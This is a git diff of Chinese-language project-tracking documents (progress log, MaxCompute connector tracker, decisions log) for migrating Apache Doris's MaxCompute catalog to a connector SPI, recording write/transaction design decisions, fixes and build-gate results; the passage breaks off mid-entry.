default(`addCommitData(byte[])`no-op/`supportsWriteBlockAllocation`false/`allocateWriteBlockRange`throws/`getUpdateCnt`0);`Connector.getWritePlanProvider`default null;新 3 类 `ConnectorWritePlanProvider`/`ConnectorSinkPlan`(包`TDataSink`)/`ConnectorWriteHandle`(仿 scan 包结构;字段 minimal,W5 细化)。**W2**(`fe-core`)`Transaction` 接口 +4 同名 default(`allocateWriteBlockRange` 声明 `throws UserException` 对齐 MC `allocateBlockIdRange`);MC/HMS/Iceberg override `addCommitData`=TBinaryProtocol 反序列化→走既有 `updateXxxCommitData(singletonList)`(**golden 等价 by construction**:`addAll(list)`≡逐个`add`),MC 另 override block 分配,3 处 `getUpdateCnt` +@Override。守门全绿(真实 exit code 核验):fe-connector-api(compile+import-gate+checkstyle 0)+fe-core(compile BUILD SUCCESS+checkstyle 0)。**W2 override 暂 dead**(W3 接线前 Coordinator 仍 concrete cast)→零行为变更。**未提交**。下一步 **W3**(解耦热路径+golden 测)。坑:maven 必用绝对 `-f`(cwd 漂移破相对路径);读真实 `MVN_EXIT`/`CS_EXIT` 而非后台"exit code"通知。 +- **2026-06-06** 🚧 **P4 maxcompute 启动 + scope=C(写-SPI RFC 先行)+ 写/事务 SPI RFC 出稿并批准**(design-only,零生产代码):分叉决策定 **P4**(非批 E/P7)。maxcompute recon 关键发现 **它会写**(`MCTransaction` 在 `Coordinator:2539`/`FrontendServiceImpl:3702`(allocateBlockIdRange)/`LoadProcessor:240` 热路径 live cast;连接器是只读骨架;~36 反向引用 21mech/15live;模型 clean 无 hudi 寄生陷阱)→ 写路径=keystone(不先做写 SPI 不能翻闸)→ 用户选 **scope C**。按用户指令**完整调研 maxcompute/hive/iceberg 三写者写能力 + paimon 前瞻**(11 路只读 code-grounded recon):三者同生命周期(begin→BE写→commit载荷回调→finish→commit)⊥ 三处分歧(①commit 载荷型 mc-binary/hive-partition/iceberg-file ②mc block-id 唯一写期 BE↔FE RPC ③iceberg procedures+delete/merge);**P0 写面已大半就绪**(`ConnectorWriteOps`+`ConnectorTransaction`+`PluginDrivenInsertExecutor`+`PluginDrivenTransactionManager`,仅 JDBC 实现)→ 是扩展+桥接+解耦非重造。出 **写/事务 SPI RFC**(`tasks/designs/connector-write-spi-rfc.md`),用户签字 5 决策:**A** 连接器事务为源·桥接、**B1** commit 载荷 opaque bytes(零 BE 改、留一处 serialization shim 诚实标记)、**C1** block-id 窄 callback seam、**D** INSERT/DELETE/MERGE(defer procedures/E2-P6 + hive 行级 ACID/P7)、**E** 写-plan-provider 仿 scan。**用户批准 → 启 W-phase**(共享解耦:SPI 面 + fe-core `Transaction` 泛化 + 解耦 3 热路径 cast/instanceof,**behind gate、不搬类、零行为变更/golden 等价**),实现待下一 session(RFC §12 W1→W7)。研究:`research/p4-maxcompute-migration-recon.md` + `research/connector-write-spi-recon.md`。**待补**:decisions-log D-021(scope=C)/D-022(写 SPI 设计) + 01-spi-rfc E11(W7) - **2026-06-05** ✅ **P3 批 D 完成(T08 `tableFormatType` 分流消费设计备忘,design-only)= P3 hybrid in-scope(批 A–D)全完成**:以上 session 的 6-reader recon(`research/spi-multi-format-hms-catalog-analysis.md`)为直接输入,本场不重复 recon、只 firsthand 核读 load-bearing 锚点(确认 keystone gap:`PluginDrivenExternalTable.initSchema` 只读 columns 丢 `tableFormatType`;新增第二缺口:`getEngine`/`getEngineTableTypeName` switch catalog type 非 per-table format;`planScan` 入参带 per-table handle)。**核心分析贡献**:把 keystone 拆成可分离的 **M1 身份消费 ⊥ M2 scan 路由**(M1 三方案通用,A/B/C 只在 M2 分歧)。M2 三方案评估后 **AskUserQuestion 用户签字 = 方案 B**([D-020]):新增向后兼容 default `ConnectorMetadata.getScanPlanProvider(handle)`(默认 null→回落 per-catalog),fe-core `PluginDrivenScanNode.getSplits` 优先 per-table、回落 per-catalog;把 per-table 选 provider 升为一等 SPI 契约(满足 D-009 default-only)。A(连接器内 router,零 SPI churn)备选;C(fe-core 发现期分派)否决(违瘦 fe-core)。**细化 D-005**(区分符沿用;"PhysicalXxxScan" 措辞早于 P1 scan-node 统一,由 per-table provider seam 取代)。缩界:本场零代码、gate 不动;Iceberg-on-hms 经 SPI 依赖 P6/M3;M1+M2 实现登记批 E/P7。**P3 hybrid 净产出**=2 正确性修(T02/T05)+ 2 fail-loud/决策(T04/T06)+ 测试网零→59 测(T07)+ 模型 dispatch 设计(T08/D-020)。**P3 PR [#64143](https://github.com/apache/doris/pull/64143) 已开**(base branch-catalog-spi,26 files +3065/−154,12 commits);下一步=监控 CI / 处理 review,批 E 并入 P7 / 启 P4。设计 `designs/P3-T08-tableformat-dispatch-design.md` - **2026-06-05** ✅ **P3 批 C 编码完成(T07 三模块测试基线 + COW/MOR schema parity)**:feasibility recon(5-agent code-grounded workflow)定 **golden-value parity**(fe-core 只依赖 fe-connector-api/-spi、不依赖具体连接器模块,无跨模块编译路径;JUnit5 + 手写替身);关键结论 **COW/MOR schema type-agnostic**(legacy/SPI 两侧 schema 推导都不按表型分支,差异只在 scan planning)。落地:**hudi**——`avroSchemaToColumns` 顶层列名 `toLowerCase` 修(gap-1,镜像 legacy `HMSExternalTable:745`,仅顶层、嵌套 struct 名保留)+ package-private static 可测;`HudiTypeMappingTest` 补 `fromAvroSchema`→ConnectorType golden(原零覆盖);新 `HudiSchemaParityTest`(列名/序/类型/Hive 串/casing 边界 pin)+ `HudiTableTypeTest`(COW/MOR/UNKNOWN 分类)。**hms**——新 `HmsTypeMappingTest`(hms+hive 共享的 Hive 类型串解析器,原零测试)。**hive**——新 `HiveFileFormatTest` + `HiveConnectorMetadataPartitionPruningTest`(镜像 T05 裁剪网)。三模块 test:hms 12 + hive 14 + hudi +18=33 全绿;checkstyle 0(含 test 源);import-gate 通过。**两 parity gap**([DV-008]):gap-1 列名 casing 当场修(用户签字),gap-2 Hudi meta-field 纳入(`getTableAvroSchema(true)` vs 无参)推迟批 E(无真实 metaclient 不可单测)。下一步批 D(T08 design-only)。设计:`designs/P3-T07-test-baseline-design.md` - **2026-06-05** ✅ **P3 批 B 编码完成**(T05 ✅ + T06 决策,[DV-007]):**T05**(commit `10b72d4`,feat)`HudiConnectorMetadata.applyFilter` 真实 EQ/IN 分区裁剪——原占位实现列**全部** HMS 分区不裁剪、且无条件设 `prunedPartitionPaths` 静默把分区来源从 Hudi-metadata 切到 HMS;重写为忠实镜像 `HiveConnectorMetadata`(抽取 partition 列 EQ/IN 谓词→列候选→裁剪→仅有效果时回传 pruned handle,否则 `Optional.empty()` 回落 Hudi-metadata listing),保留 `List` 路径表示 + `-1` 上限,7 helper duplicate from Hive(hudi 仅依赖 fe-connector-hms)。`HudiPartitionPruningTest` 8 测全绿(模块 19 测)、checkstyle 0、import-gate 通过。**T06**(零代码决策,用户签字)MVCC/snapshot SPI **保持 default `Optional.empty()` opt-out**——recon 证「显式抛异常 override」错(破 SPI opt-out 约定、全体连接器无 override、无 production caller=死代码、T04 已 fail-loud time-travel);完整 MVCC 入批 E。**scope 校正**([DV-007]):T05 `listPartitions*` override 推迟批 E(零 live caller、Hive 不 override)。批 A+B 编码完成,下一步批 C(三模块测试 + COW/MOR parity)。设计:`designs/P3-T05-*` / `P3-T06-*` @@ -179,8 +202,8 @@ | 类型 | 总数 | 最新条目 | 文档 | |---|---|---|---| -| **决策**(D-NNN) | 20 | D-020(单 `hms` 多格式 scan 路由=方案 B per-table provider;细化 D-005)| [decisions-log.md](./decisions-log.md) | -| **偏差**(DV-NNN) | 8 | DV-008(P3-T07 parity gap:列名 casing 当场修、Hudi meta-field 纳入推迟批 E)| [deviations-log.md](./deviations-log.md) | +| **决策**(D-NNN) | 25 | D-025(P4-T04 写计划 5 决策:OQ-2=Approach A / D-2a seam fill / D-3 抽 `getSettings()` / D-4 `supportsInsert` / D-5 静态分区 map);D-024(P4-T03 两 fork)| [decisions-log.md](./decisions-log.md) | +| **偏差**(DV-NNN) | 12 | DV-012(P4-T04 `partition_columns` 取 ODPS 表列,源不同值同);DV-011(P4-T03 block 上限常量)| [deviations-log.md](./deviations-log.md) | | **风险**(R-NNN) | 14 | R-014(thrift sink 选择灵活性) | [risks.md](./risks.md) | --- @@ -189,9 +212,9 @@ > 当本项目通过 Claude Code 这类 LLM agent 推进时,跟踪当前 session 状态、handoff 状况和 context 健康度。 -- **本 session 已完成**:P3 批 D(T08 design-only,AskUserQuestion 用户签字 M2=方案 B)——`tableFormatType` 分流消费设计备忘 + [D-020];核心拆解 **M1 身份消费 ⊥ M2 scan 路由**;细化 D-005;同步 tasks/P3(T08 ✅ + 阶段日志)+ PROGRESS(§一/§二/§三/§四/§六/§七)+ decisions-log(D-020)+ connectors/hudi + 设计备忘 P3-T08 + HANDOFF;研究输入 `research/spi-multi-format-hms-catalog-analysis.md` 一并纳入 git 跟踪(design 引用,避免悬空) -- **下一个 session 应做**(**P3 hybrid in-scope 批 A–D 完成,PR #64143 已开**):监控 [PR #64143](https://github.com/apache/doris/pull/64143) CI / 处理 review;待合入后 **批 E 并入 P7**(live cutover,不在 P3 编码)或启 **P4**(maxcompute)。**P3 内不要碰 `SPI_READY_TYPES` / fe-core 消费实现 / legacy / 非 hudi 连接器(皆批 E)** -- **是否需要 handoff**:**是**——本场已 rewrite [HANDOFF.md](./HANDOFF.md)(P3 批 A–D 完成总结 + D-020/M1⊥M2 认知 + 批 E/PR/P4 三选项 + 沿用坑) +- **本 session 已完成**:**P4-T04 连接器写计划**(Batch B 收尾 = A+B 全完成,gate 关、dormant、零 live 风险)——新建 `MaxComputeWritePlanProvider.planWrite`(**OQ-2=Approach A**:finalizeSink 一处建写 session + `setWriteSession` 绑 txn + 盖 `txn_id`/`write_session_id`,无运行期注入)+ `MaxComputeDorisConnector.getSettings()`/`getWritePlanProvider()` + `supportsInsert()`=true + fe-core seam(`bindViaWritePlanProvider(insertCtx)` + `PluginDrivenInsertCommandContext.staticPartitionSpec`)。5 决策 [D-025];偏差 [DV-012](partition_columns 源)。守门全绿(compile BUILD SUCCESS + checkstyle 0 + import-gate 0,真实 EXIT)。测试延 P4-T10。设计 [P4-T04 doc](./tasks/designs/P4-T04-write-plan-design.md)。 +- **下一个 session 应做**:**Batch C 翻闸**(唯一 live 切点;前置 = A+B 全绿 ✅ + R-004 ODPS classloader 防御测)——P4-T05 GsonUtils `registerCompatibleSubtype` + `PluginDrivenExternalTable.getEngine`/`legacyLogTypeToCatalogType` 加 `max_compute`;P4-T06 `SPI_READY_TYPES += "max_compute"` + 删 `CatalogFactory` case + **executor 接线**(`beginTransaction`→`begin(connectorTx)` + 置 `ConnectorSessionImpl.setCurrentTransaction`)+ `GlobalExternalTransactionInfoMgr` 注册 + binding 期填 `PluginDrivenInsertCommandContext` overwrite/静态分区(T03/T04 dormant 的 live 化,坑3)。见 [tasks/P4](./tasks/P4-maxcompute-migration.md) / [HANDOFF](./HANDOFF.md)。 +- **是否需要 handoff**:**是**——本场已 rewrite [HANDOFF.md](./HANDOFF.md)(P4-T04 完成 + Batch C 翻闸首步锚点 + dormant→live 接线清单 + 守门坑沿用) - **协作规范**:[AGENT-PLAYBOOK.md](./AGENT-PLAYBOOK.md)(context 预算、subagent 使用、handoff 触发条件) --- diff --git a/plan-doc/connectors/maxcompute.md b/plan-doc/connectors/maxcompute.md index 3cbdf87b5fbdc4..cdd3cf383c5e28 100644 --- a/plan-doc/connectors/maxcompute.md +++ b/plan-doc/connectors/maxcompute.md @@ -11,9 +11,9 @@ | **fe-core 旧路径** | `fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/` | | **共享依赖** | 无 | | **计划迁移阶段** | **P4** | -| **当前状态** | ⏸ 未启动 | -| **完成度** | 25% | -| **主 owner** | TBD | +| **当前状态** | 🚧 **Batch C 翻闸完成**(T05 image-compat + T06a 写接线/UT + **T06b flip ✅** `SPI_READY_TYPES += "max_compute"`,gate 全绿 [D-027]);下一 = **Batch D**(删 legacy 子系统 + drop fe-core odps 依赖,**待用户 live ODPS 验证后做**)| +| **完成度** | 75% | +| **主 owner** | @me | --- @@ -24,11 +24,11 @@ | 1 | 🟡 | fe-core 8 个顶层(ExternalCatalog/Database/Table、MetaCache、MetadataOps、MCTransaction、SchemaCacheValue、McStructureHelper)+ `source/` 2 个 | | 2 | 🟡 | fe-connector 13 个文件,scan 路径已迁 | | 3 | ⏳ | 反向 instanceof:12 处(`PhysicalPlanTranslator`、`ShowPartitionsCommand`、`PartitionsTableValuedFunction` 等)| -| 4 | 🟡 | 多数 Metadata 方法已实现;事务相关待补 | +| 4 | ✅ | Metadata 读 + **DDL(P4-T01 ✅)** + **分区 listing(P4-T02 ✅)** + **写/事务 `ConnectorTransaction`+`beginTransaction`(P4-T03 ✅)** + **写计划 `getWritePlanProvider`→`planWrite`→`TMaxComputeTableSink`(P4-T04 ✅,OQ-2=Approach A)** 全实现(cutover 接线归 Batch C)| | 5 | ⏳ | | | 6 | ✅ | META-INF/services 已注册 | | 7 | ⏳ | | -| 8-9 | ⏳ | gsonPostProcess 加 `max_compute → plugin` 迁移 | +| 8-9 | ✅ | T05:GSON `registerCompatibleSubtype`(catalog/db/table)迁 PluginDriven(image 兼容)| | 10 | ⏳ | 清理 12 处反向 instanceof | | 11 | ⏳ | PhysicalPlanTranslator 删 `MaxComputeExternalTable` 分支 | | 12 | ⏳ | 0 个测试 | @@ -40,16 +40,16 @@ | 扩展点 | 是否需要 | 实现状态 | 备注 | |---|---|---|---| -| E1 CreateTableRequest | 🟡 | MaxCompute 支持 partition | | +| E1 CreateTableRequest | ✅ 需要 | ✅ P4-T01 | `createTable(request)` 港 legacy(identity 分区 / hash bucket / lifecycle / `mc.tblproperty.*`)| | E2 Procedures | ❌ | n/a | | | E3 MetaInvalidator | ❌ | n/a | | -| E4 Transactions | ✅ 需要 | `MCTransaction` 待迁 SPI | | +| E4 Transactions | ✅ 需要 | ✅ P4-T03(事务)+ P4-T04(写计划)| `beginTransaction`+`MaxComputeConnectorTransaction`(`addCommitData`[TBinaryProtocol]/block-alloc/commit/rollback/getUpdateCnt)✅;`getWritePlanProvider`→`MaxComputeWritePlanProvider.planWrite`→`TMaxComputeTableSink`(建写 session + `setWriteSession` 绑 txn + 盖 txn_id/write_session_id,OQ-2=Approach A)✅ | | E5 MvccSnapshot | ❌ | n/a | | | E6 VendedCredentials | ❌ | n/a | | | E7 SysTables | ❌ | n/a | | | E8 ColumnStatistics | 🟡 | | | E9 Delete/Merge sink | ❌ | | -| E10 listPartitions | ✅ 需要 | 走 SPI | +| E10 listPartitions | ✅ 需要 | ✅ P4-T02 | `listPartitions/Names/Values` 直取 ODPS `getPartitions`,filter 忽略返全量(OQ-4 无自有 cache)| --- @@ -65,13 +65,24 @@ ## 关联 - 阶段 task:P4(待启动时建) -- 决策:D-002(scan-node 复用) -- 偏差:(暂无) +- 决策:[D-025](../decisions-log.md)(P4-T04 写计划 5 决策:Approach A / seam fill / 抽 getSettings / supportsInsert / 静态分区 map)、[D-024](../decisions-log.md)(P4-T03 两 fork:txn id 分配器 / 写 session 挪 T04)、D-002(scan-node 复用) +- 偏差:[DV-012](../deviations-log.md)(P4-T04 partition_columns 取 ODPS 表列,源不同值同)、[DV-011](../deviations-log.md)(P4-T03 block 上限常量 + 异常类型)、[DV-010](../deviations-log.md)(P4-T01 修 fe-core 转换器 CHAR/VARCHAR 长度) - 风险:R-004 --- ## 进度日志 +### 2026-06-07 +- **P4-T06b 翻闸落地(Batch C 完成,唯一 live 切点)= max_compute 进 SPI**:`CatalogFactory.SPI_READY_TYPES += "max_compute"`(:52) + 删 legacy `case "max_compute"`(原 :146-149) + 删 unused `MaxComputeExternalCatalog` import + 注释去 max_compute。翻闸后 `max_compute` catalog→`PluginDrivenExternalCatalog`、table→`PluginDrivenExternalTable`(GSON T05 兼容),读/写/DDL/分区/show 全经 SPI;legacy `instanceof MaxCompute*` 分支全失配(dead)。gate 全绿(compile BUILD SUCCESS/MVN_EXIT=0 + checkstyle 0/CS_EXIT=0 + import-gate 0,真实 EXIT 核)。**前继 T05/T06a 已 commit**(image-compat + dormant 写接线 W-a..d/G1–G5 + UT)。**SPI_READY ✅**。**2 决策 [D-027]**:flip 先行/移除待 live 验证;fe-core 仅删直接 odps 声明(transitive-via-fe-common 留)。Batch D 完整移除闭包(21 删 / ~30 清 / keep / pom drop)已 verify → [Batch D 移除设计](../tasks/designs/P4-batchD-maxcompute-removal-design.md),**执行前置门 = 用户跑 `OdpsLiveConnectivityTest`(4 个 `MC_*` 环境变量)+ 手测 smoke 绿**。 + +### 2026-06-06 +- **P4-T04 连接器写计划完成 = Batch A+B 全完成**(Batch B 收尾,gate 关、dormant、零 live 风险):新建 `MaxComputeWritePlanProvider.planWrite`(**OQ-2=Approach A**:finalizeSink 一处建 ODPS 写 session → `session.getCurrentTransaction()`→`MaxComputeConnectorTransaction.setWriteSession` 绑 txn → 盖 `TMaxComputeTableSink`(静态字段 + `static_partition_spec` + `partition_columns`(ODPS 表列) + `write_session_id` + `txn_id`),无运行期注入 hook)+ `MaxComputeDorisConnector.getSettings()`(D-3 抽出,scan/write 共用,镜像 legacy 单 settings)/`getWritePlanProvider()` + `supportsInsert()`=true(D-4,余 throwing-default 待 Batch C)+ fe-core seam(`PluginDrivenTableSink.bindViaWritePlanProvider(insertCtx)` 读 overwrite+静态分区 / `PluginDrivenInsertCommandContext.staticPartitionSpec`,非基类避 `MCInsertCommandContext` shadow)。5 决策 [D-025];偏差 [DV-012](partition_columns 取 ODPS 表列)。坑10 javap 全核;写路径 ArrowOptions MILLI/MILLI(≠scan);block_id 不盖(运行期 T03)。守门全绿(compile BUILD SUCCESS + checkstyle 0 + import-gate,真实 EXIT)。单测延 P4-T10。下一步 = **Batch C 翻闸**(live,前置 R-004 防御测)。 +- **P4-T03 连接器写/事务 SPI 完成**(Batch B 启,gate 关、dormant):新建 `MaxComputeConnectorTransaction`(港 `MCTransaction`:`addCommitData`[TBinaryProtocol 红线]/block-alloc/commit/rollback/getUpdateCnt)+ `MaxComputeConnectorMetadata.beginTransaction`,over W4 委派。两 fork [D-024]:txn id 经新增 `ConnectorSession.allocateTransactionId()`(尊重 [D-015])/ 写 session 创建挪 T04。偏差 [DV-011](block 上限常量、`DorisConnectorException`)。JDBC 仅半样板(无 `ConnectorTransaction`),MC 首个有状态事务 adopter。守门全绿(compile + checkstyle 0 + import-gate,真实 EXIT)。单测延 P4-T10。下一步 = P4-T04 写计划。 +- **P4-T02 连接器分区 listing 完成**(Batch A 收尾,gate 关、dormant、零 live 风险):`MaxComputeConnectorMetadata` impl SPI `listPartitionNames`/`listPartitions`/`listPartitionValues`,三方法直取 `structureHelper.getPartitions(odps, db, tbl)`:names = `PartitionSpec.toString(false,true)`(镜像 legacy `MaxComputeExternalCatalog:283`/`MaxComputeExternalTable:201`);`listPartitions` filter **忽略**返全量(values 由 `PartitionSpec.keys()`/`get(k)`、props=emptyMap);`listPartitionValues` 按入参列序 `spec.get(col)`。**OQ-4 定**:不建连接器自有 cache,直取 ODPS(Rule 2 不投机)。**保真**:legacy 双路径分歧(catalog 无 emptiness guard / table 有),SPI 锚 catalog SHOW PARTITIONS 故不加 guard;写前 javap 验 ODPS `PartitionSpec` API。测试延至 **P4-T10**(无 mockito 基线)。守门全绿(compile BUILD SUCCESS + checkstyle 0 + import-gate,真实 EXIT 核验)。下一步 = Batch B(P4-T03 写/事务 SPI)。 +- **P4-T01 连接器 DDL 完成**(Batch A,gate 关、dormant、零 live 风险):`MaxComputeConnectorMetadata` impl SPI `createTable(ConnectorCreateTableRequest)` / `dropTable` / `createDatabase` / `dropDatabase`(忠实港 legacy `MaxComputeMetadataOps`,消费 P0 request 非 fe-core `CreateTableInfo`;连接器 `McStructureHelper` ODPS DDL 原语已具备)+ 新 `MCTypeMapping.toMcType(ConnectorType)` 反向类型映射(递归 ARRAY/MAP/STRUCT)。附带修 fe-core 共享转换器 CHAR/VARCHAR 长度 [DV-010](../deviations-log.md)(用户签字)+ 回归测。守门全绿(compile + checkstyle 0 + import-gate + `ConnectorColumnConverterTest` 9/0F0E)。下一步 = P4-T02 分区 listing。 +- **P4 adopter 设计批准**([D-023](../decisions-log.md)):5 批 / 11 task 计划见 [tasks/P4](../tasks/P4-maxcompute-migration.md)。re-grep 校正反向引用 **~19**(旧称「12」失真;W-phase 已灭 `Coordinator`/`LoadProcessor`/`FrontendServiceImpl` 3 热点 txn 站)。连接器现状核实:写 SPI **全缺**(无 `getWritePlanProvider`/`beginTransaction`/`ConnectorWriteOps`)、DDL **缺**(仅 `McStructureHelper` 低层 helper)、分区 listing **缺**;`MCTransaction` 已含 W2 `addCommitData(byte[])`,`TMaxComputeTableSink` 18 字段齐。**下一步 = Batch A**(P4-T01 DDL + P4-T02 分区,gate 关)。 +- **W-phase(共享写/事务 SPI)全落地**([D-021](../decisions-log.md) / [D-022](../decisions-log.md)):maxcompute 是首个 adopter 的靶。**写接线 seam 已就位**——fe-core `Transaction` 写回调 + `PluginDrivenTransaction` 桥(W4 `759cc0874c8`)、写-plan-provider layer 进既有 plugin-driven 写路径(W5 `9ebe5e27fa4`,[DV-009](../deviations-log.md))。**P4 adopter 待做**:搬 `datasource/maxcompute/` → `fe-connector-maxcompute`;impl `ConnectorWriteOps`(insert) / `ConnectorTransaction`(over `addCommitData` + `allocateWriteBlockRange`,仅 mc 需 block-id seam) / `ConnectorWritePlanProvider`(产 `TMaxComputeTableSink`);翻闸 `SPI_READY_TYPES+="max_compute"` + 删 `CatalogFactory` case + GSON 兼容 + `getEngine` 分支;清 ~12 反向 instanceof;连接器测试基线。详见 [写 RFC §12](../tasks/designs/connector-write-spi-rfc.md)。 + ### 2026-05-24 - 跟踪文件建立。60% 实现已就位;重复类 `McStructureHelper` 已在 P1 清单。 diff --git a/plan-doc/decisions-log.md b/plan-doc/decisions-log.md index a04cfff764bf4b..1965d7f1a8e6d0 100644 --- a/plan-doc/decisions-log.md +++ b/plan-doc/decisions-log.md @@ -15,6 +15,22 @@ | 编号 | 别名 | 简述 | 日期 | 状态 | |---|---|---|---|---| +| D-036 | — | **P4-T06e FIX-CAST-PUSHDOWN MaxCompute 关 CAST 谓词下推 + 剥壳时抑制 source LIMIT(F9 静默丢行回归,review 原误判 known-degr 已推翻)**:共享 converter 无条件剥 CAST(`ExprToConnectorExpressionConverter:108`)、MaxCompute 不 override `supportsCastPredicatePushdown`(继承默认 true)→ `buildRemainingFilter` 不剔除含 CAST 的 conjunct → 剥壳谓词推入 ODPS read session(`CAST(str AS INT)=5`→源过滤 `str="5"` 按列 STRING quote)→ 源端 under-match 丢 `'05'/' 5'`、BE 复算只能过滤超集向下无法找回 → **静默丢行**。legacy `convertSlotRefToColumnName` 对 CAST 操作数抛异常→caught→丢弃该谓词(BE-only)→正确 ⇒ cutover 比 legacy 严格更紧 = **回归**(区别于 [DV-016] 仅 limit-opt 资格 CAST-unwrap、非丢行)。**对抗核验 `wzoa6dkvw` 0/3 refuted、verdict=real-unregistered-regression**。**用户定 Fix**。修 = ① 连接器 `MaxComputeConnectorMetadata.supportsCastPredicatePushdown→false`(激活既有 strip 路径、CAST conjunct 保留 BE-only、恢复 legacy parity;镜像 JDBC + `ConnectorPushdownOps` doc 处方;无 SPI 变更、无新路径);② fe-core `getSplits` 在 CAST conjunct 被剥(`filteredToOriginalIndex!=null`)时抑制 source LIMIT 下推(抽纯静态 `effectiveSourceLimit`)——否则连接器收空 filter→limit-opt(ON 时) row-offset 读首 N 行无谓词→BE under-return(impl-review `wj2h0120n` F9-LIMITOPT-1 折入;`startSplit` 批路径已恒 -1[DEC-1] 故只改 getSplits)。守门:连接器 UT 2/2+mutation(false→true 红)、fe-core LimitStrip 2/2+BatchMode 9/9+mutation 2/2 向红、checkstyle 0、import-gate 净。真值闸=live ODPS CAST(str)=5 返回全集(DV-020,CI 跳)。out-of-scope surface:JDBC `applyLimit`+cast-off 理论同类(MC 不 override applyLimit、本修对 MC 完整)。commit `cc32521ed99` | 2026-06-08 | ✅ | +| D-035 | — | **P4-T06e FIX-BATCH-MODE-SPLIT 通用 batch SPI 路径恢复异步分批 split(Shape A,NG-7/F6=F13 minor)**:翻闸后 `PluginDrivenScanNode` 不 override `isBatchMode/numApproximateSplits/startSplit` → 继承 `SplitGenerator` 默认(false/-1/no-op)→ plugin-driven(含 MC) 读永走同步 `getSplits` 一次性枚举全(已裁剪)分区 split;legacy `MaxComputeScanNode:214-298` 分批异步建 read session 流式喂 split。P1-4 后降级收窄到「裁剪后仍 ≥`num_partitions_in_batch_mode` 分区」(规划慢 + 大 session 潜在 OOM、行正确)。**用户定「实现 batch SPI 路径」(非 DV)**。修 = **Shape A(薄 SPI + fe-core 编排、逐字镜像 legacy)**:① SPI `ConnectorScanPlanProvider` +2 additive default(`supportsBatchScan` 默认 false / `planScanForPartitionBatch` 默认委托 6 参 `planScan` over 子集)零破坏其余 6 连接器;② 连接器 `MaxComputeScanPlanProvider.supportsBatchScan`=`odpsTable.getFileNum()>0`(`planScanForPartitionBatch` 不 override,继承默认即批语义);③ fe-core `PluginDrivenScanNode`(extends `FileQueryScanNode` 已继承 batch dispatch+stop;`PluginDrivenSplit extends FileSplit` 故 `:381` 转型安全)override `isBatchMode`(4 闸 isPruned+slots+supportsBatchScan+size≥阈值,含 SF-1 `getScanPlanProvider()` null-guard)/`numApproximateSplits`=size/`startSplit`(`getScheduleExecutor` outer/inner CompletableFuture 分批,`needMoreSplit/addToQueue/finishSchedule/setException/isStop` 契约,DEC-1 不下推 limit 传 -1 与 P3-9 limit-opt 互斥)+ 抽纯静态 `shouldUseBatchMode` 供单测。clean-room 设计验证 `wcpg9lblj` GO-WITH-EDITS(0 mustFix + 2 shouldFix:SF-1 null-guard NPE 修 + 预核文案,已折入)+ impl-review `wve7y1jst` GO-WITH-EDITS(0 mustFix + 1 shouldFix TQ-1 测试覆盖文案诚实降级 + 2 nit,已折入)。守门:编译 BUILD SUCCESS、fe-core UT 9/9、fe-connector-api UT 2/2、checkstyle 0、import-gate 净、mutation 5/5 向红。真值闸=大分区 live e2e(DV-019,CI 跳)。**Batch-D 红线**:legacy `MaxComputeScanNode` batch 逻辑须待本 fix 落才可删(读裁剪那半 P1-4 已清,本项为最后前置闸)。commit `ac8f0fc15eb` | 2026-06-08 | ✅ | +| D-034 | — | **P4-T06e FIX-POSTCOMMIT-REFRESH 接受更安全的 post-commit 刷新 swallow、不回退 legacy 传播失败(无产线逻辑改动,NG-8/F15=F21 minor)**:翻闸后 `PluginDrivenInsertExecutor.doAfterCommit()` 用 try/catch 吞 `super.doAfterCommit()`(=`handleRefreshTable`)刷新失败、INSERT 仍报 OK;legacy `MCInsertExecutor` 不 override → 异常传播 → 报 FAILED。按生命周期序 `doBeforeCommit→commit(远端持久)→doAfterCommit`,`handleRefreshTable` 跑时数据已落 ODPS/远端、FE 无法回滚,且只刷 FE 缓存 + 写 external-table refresh editlog(follower 缓存失效提示、非数据真相源)、不碰已提交数据 → 报 FAILED 会诱发重试→**重复写**。**用户定(2026-06-08):接受 swallow(更安全)+ Javadoc 泛化 + DV 登记,不回退**。改 = **无产线逻辑**:仅 Javadoc(`:164-176`) 从「只讲 JDBC_WRITE」泛化到覆盖 MC connector-transaction 路径(两路径数据均已持久;swallow 最坏只瞬时缓存 stale 自愈;显式注明有意分歧 legacy、引用 [DV-018])。对抗性安全核查:master 先本地刷新(`RefreshManager:152`)后写 editlog(`:155`),丢 editlog 仅 follower 缓存暂 stale 自愈、无正确性损失/无主从分裂。守门:checkstyle 0、import-gate 净(注释 only、字节码不变)。真值闸=CI-skip live e2e(MC INSERT 后人为令 refresh 失败→断言报 OK)。commit `1f2e00d3696` | 2026-06-08 | ✅ | +| D-033 | — | **P4-T06e FIX-ISKEY-METADATA 连接器局部恢复 isKey=true(无 SPI 变更,NG-6/F3/F10 minor)**:翻闸后 `MaxComputeConnectorMetadata.getTableSchema` 用 5 参 `ConnectorColumn` ctor(isKey 默认 false)→ `DESCRIBE` 显示 Key=NO;legacy `MaxComputeExternalTable.initSchema` 全列 isKey=true。**用户定 Fix(isKey=true 恢复 parity)**。修 = 连接器局部、不动 SPI:抽 `buildColumn(...)` 静态助手用 6 参 ctor 置 isKey=true,data+partition 两 loop 经之;converter 已透传 isKey。**作用域更正**(设计验证 `wa9t0emta`):`information_schema.columns.COLUMN_KEY` 受 `FrontendServiceImpl:962-965` OlapTable 门控、MC 前后皆空(已 parity,out-of-scope)→ 本修**仅影响 DESCRIBE**。**非纯展示**:isKey 亦喂 `UnequalPredicateInfer:278` + BE slot/column descriptor(非 OLAP 门控),但 legacy 即喂 true → 恢复 production 既有值、零新行为。clean-room 设计验证 `wa9t0emta` 0 mustFix + impl review `wrx0n11ol` 0 mustFix。UT 3/3(+37 collateral)、checkstyle 0、import-gate 净、mutation killed(isKey true→false→Failures 2)。commit `1b44cd4f065` | 2026-06-08 | ✅ | +| D-032 | — | **P4-T06e FIX-LIMIT-SPLIT-DEFAULT 连接器局部恢复 limit-split 默认 OFF 三重闸(无 SPI 变更,NG-5/F11;并闭 minors F2/F12)**:翻闸后 `MaxComputeScanPlanProvider.planScan` 丢 legacy 三重闸——`checkOnlyPartitionEquality` 恒 false stub + 从不读 `enable_mc_limit_split_optimization`(默认 false)→ `useLimitOpt = limit>0 && !filter.isPresent()`:无过滤 LIMIT 默认即压成单 row-offset split(语义反转 + 静默无视 session var),分区等值 LIMIT 路径永不触发。**用户定 Fix(恢复三重闸)**。修 = 连接器局部、**不动 SPI**:① 加 hardcode 常量 `ENABLE_MC_LIMIT_SPLIT_OPTIMIZATION`(禁依赖 fe-core `SessionVariable`,同 JDBC 约定)经 `ConnectorSession.getSessionProperties()`(live 由 `from(ctx)`→`VariableMgr.toMap` 填)读 